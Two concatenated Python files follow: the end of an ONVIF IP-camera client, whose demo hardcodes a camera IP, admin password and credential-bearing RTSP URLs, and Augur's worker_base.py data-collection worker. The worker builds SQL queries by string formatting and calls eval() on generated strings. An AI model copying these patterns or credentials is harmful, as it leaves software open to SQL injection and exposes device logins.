'profile': configuration['Profile'],
'quality': configuration['Quality']}
else:
dic = {'token': configuration['Name'], 'encoding': configuration['Encoding']}
lns.append(dic)
return lns
def getstreamuri(self) -> list:
"""
Get the stream URIs.
:return:
"""
if self.media2_service is not None:
urls = self._getstreamuri_media2()
else:
urls = self._getstreamuri_media()
return urls
def getvideo(self) -> list:
"""
获取视频信息
:return:
"""
if self.media2_service is not None:
videos = self._getvideo_media2()
else:
videos = self._getvideo_media()
return videos
# --------------------------------------------- device management ------------------------------------
def getdeviceinfo(self) -> dict:
"""
Get basic ONVIF device information, e.g.:
"FirmwareVersion": "IPC_Q1207-B0006D1904",
"HardwareId": "xdfd@SH-FA-VA",
"Manufacturer": "bbb",
"Model": "xdfd@SH-FA-VA",
"SerialNumber": "210235C3EN3193000033"
"""
resp = self.mycam.devicemgmt.GetDeviceInformation()
dic = {'manufacturer': resp.Manufacturer,
'model': resp.Model,
'firmwareversion': resp.FirmwareVersion,
'serialnumber': resp.SerialNumber,
'hardwareid': resp.HardwareId}
return dic
# ---------------------------------------- event ------------------------------------------------
def subEvent(self):
"""
Sketch of the core logic only; adapt it to real requirements.
Subscribes to event notifications using the real-time pull-point notification
interface. This loop should run on its own thread.
Reference: http://www.doc88.com/p-381499525793.html
Message flow of this mode:
CreatePullPoint ----> ipc
PullMessages ----> ipc
------ http wait n seconds ------
PullMessagesResponse <---- ipc
PullMessages ----> ipc
------ http wait n seconds ------
PullMessagesResponse <---- ipc
............
Unsubscribe ----> ipc
:return:
"""
# Subscribe to events
self.events_service = self.mycam.create_events_service()
print(self.events_service.GetEventProperties())
pullpoint = self.mycam.create_pullpoint_service()
"""模块启动时,自动启动一个线程执行清理"""
# t1 = threading.Thread(target=_time_task, daemon=True)
# t1.start()
###### _time_task #######
while True:
try:
pullmess = pullpoint.PullMessages({"Timeout": datetime.timedelta(seconds=5), "MessageLimit": 10})
print(pullmess.CurrentTime)
print(pullmess.TerminationTime)
for msg in pullmess.NotificationMessage:
print(msg)
except Exception as e:
print(e)
finally:
pass
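# A minimal usage sketch (an assumption, not part of the original demo): because
# subEvent() blocks in its pull loop, it would typically be run on a daemon thread
# so the caller stays responsive.
# import threading
# client = COnvifClient()
# if client.conn('192.0.2.10', 80, 'admin', 'password'):
# threading.Thread(target=client.subEvent, daemon=True).start()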
if __name__ == '__main__':
obj = COnvifClient()
if obj.conn('204.204.50.190', 80, 'admin', '*Ab123456') is True:
"""
{
"manufacturer": "HIKVISION",
"model": "DS-IPC-B12HV2-IA",
"firmwareversion": "V5.5.102 build 200928",
"serialnumber": "DS-IPC-B12HV2-IA20201125AACHF11786005",
"hardwareid": "88"
}
"""
print(json.dumps(obj.getdeviceinfo()))
"""
[
{"token": "Profile_1", "rtsp": "rtsp://admin:*Ab123456@204.204.50.190/Streaming/Channels/101?transportmode=unicast&profile=Profile_1"},
{"token": "Profile_2", "rtsp": "rtsp://admin:*Ab123456@204.204.50.190/Streaming/Channels/102?transportmode=unicast&profile=Profile_2"}
]
"""
print(json.dumps(obj.getstreamuri()))
"""
[
{"token": "VideoEncoderToken_1", "encoding": "H264", "ratio": "1920*1080", "fps": 25.0, "bitrate": 2614, "gop": 25, "profile": "Main", "quality": 3.0},
{"token": "VideoEncoderToken_2", "encoding": "H265", "ratio": "640*480", "fps": 8.0, "bitrate": 192, "gop": 50, "profile": "Main", "quality": 3.0}]
"""
print(json.dumps(obj.getvideo()))
"""
2021-06-01 07:15:26+00:00
2021-06-01 07:25:31+00:00
{
'SubscriptionReference': None,
'Topic': {
'_value_1': 'tns1:Monitoring/ProcessorUsage',
'Dialect': 'http://www.onvif.org/ver10/tev/topicExpression/ConcreteSet',
'_attr_1': {
}
},
'ProducerReference': None,
'Message': {
'Message': {
'Source': {
'SimpleItem': [
{
'Name': 'Token',
'Value': 'Processor_Usage'
}
],
'ElementItem': [],
'Extension': None,
'_attr_1': None
},
'Key': None,
'Data': {
'SimpleItem': [
{
'Name': 'Value',
'Value': '37'
}
],
'ElementItem': [],
'Extension': None,
'_attr_1': None
},
'Extension': None,
'UtcTime': datetime.datetime(2021, 6, 1, 7, 15, 30, tzinfo=<isodate.tzinfo.Utc object at 0x000001F821BD1F40>),
'PropertyOperation': 'Changed',
'_attr_1': {
}
}
}
}
"""
print(obj.subEvent())
|
worker_base.py
|
#SPDX-License-Identifier: MIT
""" Helper methods constant across all workers """
import requests
import datetime
import time
import traceback
import json
import os
import sys
import math
import logging
import numpy
import copy
import concurrent
import multiprocessing
import psycopg2
import csv
import io
from logging import FileHandler, Formatter, StreamHandler
from multiprocessing import Process, Queue, Pool
from os import getpid
import sqlalchemy as s
import pandas as pd
from pathlib import Path
from urllib.parse import urlparse, quote
from sqlalchemy.ext.automap import automap_base
from augur.config import AugurConfig
from augur.logging import AugurLogging
from sqlalchemy.sql.expression import bindparam
from concurrent import futures
import dask.dataframe as dd
class Worker():
ROOT_AUGUR_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
## Set Thread Safety for OSX
# os.system("./osx-thread.sh")
def __init__(self, worker_type, config={}, given=[], models=[], data_tables=[], operations_tables=[], platform="github"):
self.worker_type = worker_type
self.collection_start_time = None
self._task = None # task currently being worked on (dict)
self._child = None # process of currently running task (multiprocessing process)
self._queue = Queue() # tasks stored here 1 at a time (in a mp queue so it can translate across multiple processes)
self.data_tables = data_tables
self.operations_tables = operations_tables
self._root_augur_dir = Worker.ROOT_AUGUR_DIR
self.platform = platform
# count of tuples inserted in the database (to store stats for each task in op tables)
self.update_counter = 0
self.insert_counter = 0
self._results_counter = 0
# if we are finishing a previous task, certain operations work differently
self.finishing_task = False
# Update config with options that are general and not specific to any worker
self.augur_config = AugurConfig(self._root_augur_dir)
self.config = {
'worker_type': self.worker_type,
'host': self.augur_config.get_value('Server', 'host'),
'gh_api_key': self.augur_config.get_value('Database', 'key'),
'gitlab_api_key': self.augur_config.get_value('Database', 'gitlab_api_key'),
'offline_mode': False
}
self.config.update(self.augur_config.get_section("Logging"))
try:
worker_defaults = self.augur_config.get_default_config()['Workers'][self.config['worker_type']]
self.config.update(worker_defaults)
except KeyError as e:
logging.warning('Could not get default configuration for {}'.format(self.config['worker_type']))
worker_info = self.augur_config.get_value('Workers', self.config['worker_type'])
self.config.update(worker_info)
worker_port = self.config['port']
while True:
try:
r = requests.get('http://{}:{}/AUGWOP/heartbeat'.format(
self.config['host'], worker_port)).json()
if 'status' in r:
if r['status'] == 'alive':
worker_port += 1
except:
break
self.config.update({
'port': worker_port,
'id': "workers.{}.{}".format(self.worker_type, worker_port),
'capture_output': False,
'location': 'http://{}:{}'.format(self.config['host'], worker_port),
'port_broker': self.augur_config.get_value('Server', 'port'),
'host_broker': self.augur_config.get_value('Server', 'host'),
'host_database': self.augur_config.get_value('Database', 'host'),
'port_database': self.augur_config.get_value('Database', 'port'),
'user_database': self.augur_config.get_value('Database', 'user'),
'name_database': self.augur_config.get_value('Database', 'name'),
'password_database': self.augur_config.get_value('Database', 'password')
})
self.config.update(config)
# Initialize logging in the main process
self.initialize_logging()
# Clear log contents from previous runs
open(self.config["server_logfile"], "w").close()
open(self.config["collection_logfile"], "w").close()
# Get configured collection logger
self.logger = logging.getLogger(self.config["id"])
self.logger.info('Worker (PID: {}) initializing...'.format(str(os.getpid())))
self.task_info = None
self.repo_id = None
self.owner = None
self.repo = None
self.given = given
self.models = models
self.debug_data = [] if 'debug_data' not in self.config else self.config['debug_data']
self.specs = {
'id': self.config['id'], # what the broker knows this worker as
'location': self.config['location'], # host + port worker is running on (so broker can send tasks here)
'qualifications': [
{
'given': self.given, # type of repo this worker can be given as a task
'models': self.models # models this worker can fill for a repo as a task
}
],
'config': self.config
}
# Send broker hello message
if self.config['offline_mode'] is False:
self.connect_to_broker()
try:
self.tool_source
self.tool_version
self.data_source
except:
self.tool_source = 'Augur Worker Testing'
self.tool_version = '0.0.0'
self.data_source = 'Augur Worker Testing'
def __repr__(self):
return f"{self.config['id']}"
def write_debug_data(self, data, name):
if name in self.debug_data:
with open(f'{name}.json', 'w') as f:
json.dump(data, f)
def initialize_logging(self):
self.config['log_level'] = self.config['log_level'].upper()
if self.config['debug']:
self.config['log_level'] = 'DEBUG'
if self.config['verbose']:
format_string = AugurLogging.verbose_format_string
else:
format_string = AugurLogging.simple_format_string
formatter = Formatter(fmt=format_string)
error_formatter = Formatter(fmt=AugurLogging.error_format_string)
worker_dir = AugurLogging.get_log_directories(self.augur_config, reset_logfiles=False) + "/workers/"
Path(worker_dir).mkdir(exist_ok=True)
logfile_dir = worker_dir + f"/{self.worker_type}/"
Path(logfile_dir).mkdir(exist_ok=True)
server_logfile = logfile_dir + '{}_{}_server.log'.format(self.worker_type, self.config["port"])
collection_logfile = logfile_dir + '{}_{}_collection.log'.format(self.worker_type, self.config["port"])
collection_errorfile = logfile_dir + '{}_{}_collection.err'.format(self.worker_type, self.config["port"])
self.config.update({
'logfile_dir': logfile_dir,
'server_logfile': server_logfile,
'collection_logfile': collection_logfile,
'collection_errorfile': collection_errorfile
})
collection_file_handler = FileHandler(filename=self.config['collection_logfile'], mode="a")
collection_file_handler.setFormatter(formatter)
collection_file_handler.setLevel(self.config['log_level'])
collection_errorfile_handler = FileHandler(filename=self.config['collection_errorfile'], mode="a")
collection_errorfile_handler.setFormatter(error_formatter)
collection_errorfile_handler.setLevel(logging.WARNING)
logger = logging.getLogger(self.config['id'])
logger.handlers = []
logger.addHandler(collection_file_handler)
logger.addHandler(collection_errorfile_handler)
logger.setLevel(self.config['log_level'])
logger.propagate = False
if self.config['debug']:
self.config['log_level'] = 'DEBUG'
console_handler = StreamHandler()
console_handler.setFormatter(formatter)
console_handler.setLevel(self.config['log_level'])
logger.addHandler(console_handler)
if self.config['quiet']:
logger.disabled = True
self.logger = logger
def initialize_database_connections(self):
DB_STR = 'postgresql://{}:{}@{}:{}/{}'.format(
self.config['user_database'], self.config['password_database'], self.config['host_database'], self.config['port_database'], self.config['name_database']
)
# Create an sqlalchemy engine for both database schemas
self.logger.info("Making database connections")
db_schema = 'augur_data'
self.db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,
connect_args={'options': '-csearch_path={}'.format(db_schema)})
helper_schema = 'augur_operations'
self.helper_db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,
connect_args={'options': '-csearch_path={}'.format(helper_schema)})
metadata = s.MetaData()
helper_metadata = s.MetaData()
# Reflect only the tables we will use for each schema's metadata object
metadata.reflect(self.db, only=self.data_tables)
helper_metadata.reflect(self.helper_db, only=self.operations_tables)
Base = automap_base(metadata=metadata)
HelperBase = automap_base(metadata=helper_metadata)
Base.prepare()
HelperBase.prepare()
# So we can access all our tables when inserting, updating, etc
for table in self.data_tables:
setattr(self, '{}_table'.format(table), Base.classes[table].__table__)
try:
self.logger.info(HelperBase.classes.keys())
except:
pass
for table in self.operations_tables:
try:
setattr(self, '{}_table'.format(table), HelperBase.classes[table].__table__)
except Exception as e:
self.logger.error("Error setting attribute for table: {} : {}".format(table, e))
# Increment so we are ready to insert the 'next one' of each of these most recent ids
self.history_id = self.get_max_id('worker_history', 'history_id', operations_table=True) + 1
# Organize different api keys/oauths available
self.logger.info("Initializing API key.")
if 'gh_api_key' in self.config or 'gitlab_api_key' in self.config:
self.init_oauths(self.platform)
else:
self.oauths = [{'oauth_id': 0}]
@property
def results_counter(self):
""" Property that is returned when the worker's current results_counter is referenced
"""
if self.worker_type == 'facade_worker':
return self.cfg.repos_processed #TODO: figure out why this doesn't work...
else:
return self._results_counter
@results_counter.setter
def results_counter(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
self._results_counter = value
@property
def task(self):
""" Property that is returned when the worker's current task is referenced
"""
return self._task
@task.setter
def task(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
# If the task has one of our "valid" job types
if value['job_type'] == "UPDATE" or value['job_type'] == "MAINTAIN":
self._queue.put(value)
# Setting that causes paginating through ALL pages, not just unknown ones
# This setting is set by the housekeeper and is attached to the task before it gets sent here
if 'focused_task' in value:
if value['focused_task'] == 1:
self.logger.debug("Focused task is ON\n")
self.finishing_task = True
self._task = value
self.run()
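# A hypothetical task payload for the setter above (field names other than
# job_type/models/given/focused_task are assumptions based on how collect()
# reads the message, not the broker's actual schema):
# worker.task = {
# 'job_type': 'UPDATE',
# 'models': ['issues'],
# 'given': {'github_url': 'https://github.com/chaoss/augur.git'},
# 'focused_task': 1
# }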
def cancel(self):
""" Delete/cancel current task
"""
self._task = None
def run(self):
""" Kicks off the processing of the queue if it is not already being processed
Gets run whenever a new task is added
"""
# Spawn a subprocess to handle message reading and performing the tasks
self._child = Process(target=self.collect, args=())
self._child.start()
def collect(self):
""" Function to process each entry in the worker's task queue
Determines what action to take based off the message type
"""
self.initialize_logging() # need to initialize logging again in child process cause multiprocessing
self.logger.info("Starting data collection process\n")
self.initialize_database_connections()
while True:
if not self._queue.empty():
message = self._queue.get() # Get the task off our MP queue
else:
self.logger.info("No job found.")
break
self.logger.info("Popped off message: {}\n".format(str(message)))
if message['job_type'] == 'STOP':
break
# If task is not a valid job type
if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
raise ValueError('{} is not a recognized task type'.format(message['job_type']))
pass
# Query repo_id corresponding to repo url of given task
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(message['given'][self.given[0][0]]))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
self.logger.info("repo_id for which data collection is being initiated: {}".format(str(repo_id)))
# Call method corresponding to model sent in task
try:
model_method = getattr(self, '{}_model'.format(message['models'][0]))
self.record_model_process(repo_id, 'repo_info')
except Exception as e:
self.logger.error('Error: {}.\nNo defined method for model: {}, '.format(e, message['models'][0]) +
'must have name of {}_model'.format(message['models'][0]))
self.register_task_failure(message, repo_id, e)
break
# Model method calls wrapped in try/except so that any unexpected error that occurs can be caught
# and worker can move onto the next task without stopping
try:
self.logger.info("Calling model method {}_model".format(message['models'][0]))
self.task_info = message
self.repo_id = repo_id
self.owner, self.repo = self.get_owner_repo(list(message['given'].values())[0])
model_method(message, repo_id)
except Exception as e: # this could be a custom exception, might make things easier
self.register_task_failure(message, repo_id, e)
break
self.logger.debug('Closing database connections\n')
self.db.dispose()
self.helper_db.dispose()
self.logger.info("Collection process finished")
def sync_df_types(self, subject, source, subject_columns, source_columns):
type_dict = {}
for index in range(len(source_columns)):
if type(source[source_columns[index]].values[0]) == numpy.datetime64:
subject[subject_columns[index]] = pd.to_datetime(
subject[subject_columns[index]], utc=True
)
source[source_columns[index]] = pd.to_datetime(
source[source_columns[index]], utc=True
)
continue
type_dict[subject_columns[index]] = type(source[source_columns[index]].values[0])
subject = subject.astype(type_dict)
return subject, source
def get_sqlalchemy_type(self, data, column_name=None):
if type(data) == str:
try:
time.strptime(data, "%Y-%m-%dT%H:%M:%SZ")
return s.types.TIMESTAMP
except ValueError:
return s.types.String
elif (
isinstance(data, (int, numpy.integer))
or (isinstance(data, float) and column_name and 'id' in column_name)
):
return s.types.BigInteger
elif isinstance(data, float):
return s.types.Float
elif type(data) in [numpy.datetime64, pd._libs.tslibs.timestamps.Timestamp]:
return s.types.TIMESTAMP
elif column_name and 'id' in column_name:
return s.types.BigInteger
return s.types.String
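# Example inferences from the rules above (illustrative values only):
# "2021-06-01T07:15:26Z" -> TIMESTAMP, "hello" -> String, 42 -> BigInteger,
# 3.14 -> Float, 7.0 with column_name "issue_id" -> BigInteger.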
def _convert_float_nan_to_int(self, df):
for column in df.columns:
if (
df[column].dtype == float
and ((df[column] % 1 == 0) | (df[column].isnull())).all()
):
df[column] = df[column].astype("Int64").astype(object).where(
pd.notnull(df[column]), None
)
return df
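# Example of the conversion above: a float column [1.0, NaN, 3.0] whose non-null
# values are all whole numbers becomes the object column [1, None, 3].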
def _setup_postgres_merge(self, data_sets, sort=False):
metadata = s.MetaData()
data_tables = []
# Setup/create tables
for index, data in enumerate(data_sets):
data_table = s.schema.Table(f"merge_data_{index}_{os.getpid()}", metadata)
df = pd.DataFrame(data)
columns = sorted(list(df.columns)) if sort else df.columns
df = self._convert_float_nan_to_int(df)
for column in columns:
data_table.append_column(
s.schema.Column(
column, self.get_sqlalchemy_type(
df.fillna(method='bfill').iloc[0][column], column_name=column
)
)
)
data_tables.append(data_table)
metadata.create_all(self.db, checkfirst=True)
# Insert data to tables
for data_table, data in zip(data_tables, data_sets):
self.bulk_insert(
data_table, insert=data, increment_counter=False, convert_float_int=True
)
session = s.orm.Session(self.db)
self.logger.info("Session created for merge tables")
return data_tables, metadata, session
def _close_postgres_merge(self, metadata, session):
session.close()
self.logger.info("Session closed")
# metadata.reflect(self.db, only=[new_data_table.name, table_values_table.name])
metadata.drop_all(self.db, checkfirst=True)
self.logger.info("Merge tables dropped")
def _get_data_set_columns(self, data, columns):
if not len(data):
return []
self.logger.info("Getting data set columns")
df = pd.DataFrame(data, columns=data[0].keys())
final_columns = copy.deepcopy(columns)
for column in columns:
if '.' not in column:
continue
root = column.split('.')[0]
if root not in df.columns:
df[root] = None
expanded_column = pd.DataFrame(
df[root].where(df[root].notna(), lambda x: [{}]).tolist()
)
expanded_column.columns = [
f'{root}.{attribute}' for attribute in expanded_column.columns
]
if column not in expanded_column.columns:
expanded_column[column] = None
final_columns += list(expanded_column.columns)
try:
df = df.join(expanded_column)
except ValueError:
# columns already added (happens if trying to expand the same column twice)
# TODO: Catch this before by only looping unique prefixs?
self.logger.info("Columns have already been added, moving on...")
pass
self.logger.info(final_columns)
self.logger.info(list(set(final_columns)))
self.logger.info("Finished getting data set columns")
return df[list(set(final_columns))].to_dict(orient='records')
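# A sketch of the column expansion above (names are illustrative): given rows like
# {'id': 1, 'user': {'login': 'octocat'}} and columns ['id', 'user.login'],
# the nested 'user' dict is expanded so each returned record carries a flat
# 'user.login' key alongside 'id'.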
def organize_needed_data(
self, new_data, table_values, table_pkey, action_map={}, in_memory=True
):
if len(table_values) == 0:
return new_data, []
if len(new_data) == 0:
return [], []
need_insertion = pd.DataFrame()
need_updates = pd.DataFrame()
if not in_memory:
new_data_columns = action_map['insert']['source']
table_value_columns = action_map['insert']['augur']
if 'update' in action_map:
new_data_columns += action_map['update']['source']
table_value_columns += action_map['update']['augur']
(new_data_table, table_values_table), metadata, session = self._setup_postgres_merge(
[
self._get_data_set_columns(new_data, new_data_columns),
self._get_data_set_columns(table_values, table_value_columns)
]
)
need_insertion = pd.DataFrame(session.query(new_data_table).join(table_values_table,
eval(
' and '.join([
f"table_values_table.c.{table_column} == new_data_table.c.{source_column}" \
for table_column, source_column in zip(action_map['insert']['augur'],
action_map['insert']['source'])
])
), isouter=True).filter(
table_values_table.c[action_map['insert']['augur'][0]] == None
).all(), columns=table_value_columns)
self.logger.info("need_insertion calculated successfully")
need_updates = pd.DataFrame(columns=table_value_columns)
if 'update' in action_map:
need_updates = pd.DataFrame(session.query(new_data_table).join(table_values_table,
s.and_(
eval(' and '.join([f"table_values_table.c.{table_column} == new_data_table.c.{source_column}" for \
table_column, source_column in zip(action_map['insert']['augur'], action_map['insert']['source'])])),
eval(' and '.join([f"table_values_table.c.{table_column} != new_data_table.c.{source_column}" for \
table_column, source_column in zip(action_map['update']['augur'], action_map['update']['source'])]))
) ).all(), columns=table_value_columns)
self.logger.info("need_updates calculated successfully")
self._close_postgres_merge(metadata, session)
new_data_df = pd.DataFrame(new_data)
need_insertion, new_data_df = self.sync_df_types(
need_insertion, new_data_df, table_value_columns, new_data_columns
)
need_insertion = need_insertion.merge(
new_data_df, how='inner', left_on=table_value_columns, right_on=new_data_columns
)
self.logger.info(
f"Table needs {len(need_insertion)} insertions and "
f"{len(need_updates)} updates.\n")
else:
table_values_df = pd.DataFrame(table_values, columns=table_values[0].keys())
new_data_df = pd.DataFrame(new_data).dropna(subset=action_map['insert']['source'])
new_data_df, table_values_df = self.sync_df_types(new_data_df, table_values_df,
action_map['insert']['source'], action_map['insert']['augur'])
need_insertion = new_data_df.merge(table_values_df, suffixes=('','_table'),
how='outer', indicator=True, left_on=action_map['insert']['source'],
right_on=action_map['insert']['augur']).loc[lambda x : x['_merge']=='left_only']
if 'update' in action_map:
new_data_df, table_values_df = self.sync_df_types(new_data_df, table_values_df,
action_map['update']['source'], action_map['update']['augur'])
partitions = math.ceil(len(new_data_df) / 1000)
attempts = 0
while attempts < 50:
try:
need_updates = pd.DataFrame()
self.logger.info(f"Trying {partitions} partitions\n")
for sub_df in numpy.array_split(new_data_df, partitions):
self.logger.info(f"Trying a partition, len {len(sub_df)}\n")
need_updates = pd.concat([ need_updates, sub_df.merge(table_values_df, left_on=action_map['insert']['source'],
right_on=action_map['insert']['augur'], suffixes=('','_table'), how='inner',
indicator=False).merge(table_values_df, left_on=action_map['update']['source'],
right_on=action_map['update']['augur'], suffixes=('','_table'), how='outer',
indicator=True).loc[lambda x : x['_merge']=='left_only'] ])
self.logger.info(f"need_updates merge: {len(sub_df)} worked\n")
break
except MemoryError as e:
self.logger.info(f"new_data ({sub_df.shape}) is too large to allocate memory for " +
f"need_updates df merge.\nMemoryError: {e}\nTrying again with {partitions + 1} partitions...\n")
partitions += 1
attempts += 1
# self.logger.info(f"End attempt # {attempts}\n")
if attempts >= 50:
self.loggger.info("Max need_updates merge attempts exceeded, cannot perform " +
"updates on this repo.\n")
else:
need_updates = need_updates.drop([column for column in list(need_updates.columns) if \
column not in action_map['update']['augur'] and column not in action_map['insert']['augur']],
axis='columns')
for column in action_map['insert']['augur']:
need_updates[f'b_{column}'] = need_updates[column]
need_updates = need_updates.drop([column for column in action_map['insert']['augur']], axis='columns')
return need_insertion.to_dict('records'), need_updates.to_dict('records')
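# A hypothetical action_map for the method above (column names are illustrative,
# not taken from an actual Augur table definition):
# action_map = {
# 'insert': {'source': ['id'], 'augur': ['gh_issue_id']},
# 'update': {'source': ['state'], 'augur': ['issue_state']}
# }
# need_insertion, need_updates = self.organize_needed_data(
# new_data, table_values, table_pkey='issue_id', action_map=action_map)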
def assign_tuple_action(self, new_data, table_values, update_col_map, duplicate_col_map, table_pkey, value_update_col_map={}):
""" DEPRECATED
Include an extra key-value pair on each element of new_data that represents
the action that should be taken with this element (i.e. 'need_insertion')
:param new_data: List of dictionaries, data to be assigned an action to
:param table_values: Pandas DataFrame, existing data in the database to check
what action should be taken on the new_data depending on the presence of
each element in this DataFrame
:param update_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
updates (if source data value != value in existing database row, then an
update is needed). Key is source data column name, value is database field name.
Example: {'id': 'gh_issue_id'}
:param duplicate_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
duplicates (if source data value == value in existing database row, then this
element is a duplicate and would not need an insertion). Key is source data
column name, value is database field name. Example: {'id': 'gh_issue_id'}
:param table_pkey: String, the field name of the primary key of the table in
the database that we are checking the table_values for.
:param value_update_col_map: Dictionary, sometimes we add a new field to a table,
and we want to trigger an update of that row in the database even if all of the
data values are the same and would not need an update ordinarily. Checking for
a specific existing value in the database field allows us to do this. The key is the
name of the field in the database we are checking for a specific value to trigger
an update, the value is the value we are checking for equality to trigger an update.
Example: {'cntrb_id': None}
:return: List of dictionaries, contains all the same elements of new_data, except
each element now has an extra key-value pair with the key being 'flag', and
the value being 'need_insertion', 'need_update', or 'none'
"""
need_insertion_count = 0
need_update_count = 0
if type(table_values) == list:
if len(table_values) > 0:
table_values = pd.DataFrame(table_values, columns=table_values[0].keys())
else:
table_values = pd.DataFrame(table_values)
for i, obj in enumerate(new_data):
if type(obj) != dict:
new_data[i] = {'flag': 'none'}
continue
obj['flag'] = 'none' # default of no action needed
existing_tuple = None
for db_dupe_key in list(duplicate_col_map.keys()):
if table_values.isin([obj[duplicate_col_map[db_dupe_key]]]).any().any():
if table_values[table_values[db_dupe_key].isin(
[obj[duplicate_col_map[db_dupe_key]]])].to_dict('records'):
existing_tuple = table_values[table_values[db_dupe_key].isin(
[obj[duplicate_col_map[db_dupe_key]]])].to_dict('records')[0]
continue
obj['flag'] = 'need_insertion'
need_insertion_count += 1
break
if obj['flag'] == 'need_insertion':
continue
if not existing_tuple:
self.logger.info('An existing tuple was not found for this data ' +
'point and we have reached the check-updates portion of assigning ' +
'tuple action, so we will now move to next data point\n')
continue
# If we need to check the values of the existing tuple to determine if an update is needed
for augur_col, value_check in value_update_col_map.items():
not_nan_check = not (math.isnan(value_check) and math.isnan(existing_tuple[augur_col])) if value_check is not None else True
if existing_tuple[augur_col] != value_check and not_nan_check:
continue
self.logger.info("Found a tuple that needs an update for column: {}\n".format(augur_col))
obj['flag'] = 'need_update'
obj['pkey'] = existing_tuple[table_pkey]
need_update_count += 1
if obj['flag'] == 'need_update':
self.logger.info('Already determined that current tuple needs update, skipping checking further updates. '
'Moving to next tuple.\n')
continue
# Now check the existing tuple's values against the response values to determine if an update is needed
for col in update_col_map.keys():
if update_col_map[col] not in obj:
continue
if obj[update_col_map[col]] == existing_tuple[col]:
continue
self.logger.info("Found a tuple that needs an update for column: {}\n".format(col))
obj['flag'] = 'need_update'
self.logger.info(existing_tuple)
obj['pkey'] = existing_tuple[table_pkey]
need_update_count += 1
self.logger.info("Page recieved has {} tuples, while filtering duplicates this ".format(len(new_data)) +
"was reduced to {} tuples, and {} tuple updates are needed.\n".format(need_insertion_count, need_update_count))
return new_data
def check_duplicates(self, new_data, table_values, key):
""" Filters what items of the new_data json (list of dictionaries) that are not
present in the table_values df
:param new_data: List of dictionaries, new data to filter duplicates out of
:param table_values: Pandas DataFrame, existing data to check what data is already
present in the database
:param key: String, key of each dict in new_data whose value we are checking
duplicates with
:return: List of dictionaries, contains elements of new_data that are not already
present in the database
"""
need_insertion = []
for obj in new_data:
if type(obj) != dict:
continue
if not table_values.isin([obj[key]]).any().any():
need_insertion.append(obj)
self.logger.info("Page recieved has {} tuples, while filtering duplicates this ".format(str(len(new_data))) +
"was reduced to {} tuples.\n".format(str(len(need_insertion))))
return need_insertion
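# Example of the duplicate filter above: with key='id', new_data
# [{'id': 1}, {'id': 2}] checked against a table_values frame that already
# contains the value 1 yields need_insertion == [{'id': 2}].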
def connect_to_broker(self):
connected = False
for i in range(5):
try:
self.logger.debug("Connecting to broker, attempt {}\n".format(i))
if i > 0:
time.sleep(10)
requests.post('http://{}:{}/api/unstable/workers'.format(
self.config['host_broker'],self.config['port_broker']), json=self.specs)
self.logger.info("Connection to the broker was successful\n")
connected = True
break
except requests.exceptions.ConnectionError:
self.logger.error('Cannot connect to the broker. Trying again...\n')
if not connected:
sys.exit('Could not connect to the broker after 5 attempts! Quitting...\n')
@staticmethod
def dump_queue(queue):
""" Empties all pending items in a queue and returns them in a list.
"""
result = []
queue.put("STOP")
for i in iter(queue.get, 'STOP'):
result.append(i)
# time.sleep(.1)
return result
def find_id_from_login(self, login, platform='github'):
""" Retrieves our contributor table primary key value for the contributor with
the given GitHub login credentials, if this contributor is not there, then
they get inserted.
:param login: String, the GitHub login username to find the primary key id for
:return: Integer, the id of the row in our database with the matching GitHub login
"""
idSQL = s.sql.text("""
SELECT cntrb_id FROM contributors WHERE cntrb_login = '{}' \
AND LOWER(data_source) = '{} api'
""".format(login, platform))
rs = pd.read_sql(idSQL, self.db, params={})
data_list = [list(row) for row in rs.itertuples(index=False)]
try:
return data_list[0][0]
except:
self.logger.info('contributor needs to be added...')
if platform == 'github':
cntrb_url = ("https://api.github.com/users/" + login)
elif platform == 'gitlab':
cntrb_url = ("https://gitlab.com/api/v4/users?username=" + login )
self.logger.info("Hitting endpoint: {} ...\n".format(cntrb_url))
while True:
try:
r = requests.get(url=cntrb_url, headers=self.headers)
break
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(30)
self.update_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
if platform == 'github':
cntrb = {
'cntrb_login': contributor['login'] if 'login' in contributor else None,
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_created_at': contributor['created_at'] if 'created_at' in contributor else None,
'cntrb_canonical': None,
'gh_user_id': contributor['id'] if 'id' in contributor else None,
'gh_login': contributor['login'] if 'login' in contributor else None,
'gh_url': contributor['url'] if 'url' in contributor else None,
'gh_html_url': contributor['html_url'] if 'html_url' in contributor else None,
'gh_node_id': contributor['node_id'] if 'node_id' in contributor else None,
'gh_avatar_url': contributor['avatar_url'] if 'avatar_url' in contributor else None,
'gh_gravatar_id': contributor['gravatar_id'] if 'gravatar_id' in contributor else None,
'gh_followers_url': contributor['followers_url'] if 'followers_url' in contributor else None,
'gh_following_url': contributor['following_url'] if 'following_url' in contributor else None,
'gh_gists_url': contributor['gists_url'] if 'gists_url' in contributor else None,
'gh_starred_url': contributor['starred_url'] if 'starred_url' in contributor else None,
'gh_subscriptions_url': contributor['subscriptions_url'] if 'subscriptions_url' in contributor else None,
'gh_organizations_url': contributor['organizations_url'] if 'organizations_url' in contributor else None,
'gh_repos_url': contributor['repos_url'] if 'repos_url' in contributor else None,
'gh_events_url': contributor['events_url'] if 'events_url' in contributor else None,
'gh_received_events_url': contributor['received_events_url'] if 'received_events_url' in contributor else None,
'gh_type': contributor['type'] if 'type' in contributor else None,
'gh_site_admin': contributor['site_admin'] if 'site_admin' in contributor else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
elif platform == 'gitlab':
cntrb = {
'cntrb_login': contributor[0]['username'] if 'username' in contributor[0] else None,
'cntrb_email': email,
